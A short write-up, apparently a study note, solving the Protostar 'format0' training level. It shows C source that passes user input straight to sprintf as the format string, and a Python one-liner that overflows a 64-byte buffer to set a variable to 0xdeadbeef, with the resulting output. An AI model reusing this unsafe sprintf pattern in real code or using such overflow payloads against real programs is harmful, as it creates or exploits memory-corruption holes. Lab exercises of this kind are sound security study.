format0

buffer[64] + target(4) 존재 . 

#include <stdlib.h>

#include <unistd.h> #include <stdio.h> #include <string.h> void vuln(char *string) { volatile int target; char buffer[64]; target = 0; sprintf(buffer, string); if(target == 0xdeadbeef) { printf("you have hit the target correctly :)\n"); } } int main(int argc, char **argv) { vuln(argv[1]); }

root@s0ngsari-virtual-machine:~/Desktop/study/protostar/format# ./format0 $(python -c 'print "\x90"*64 + "\xef\xbe\xad\xde"')

you have hit the target correctly :)

Segmentation fault (core dumped)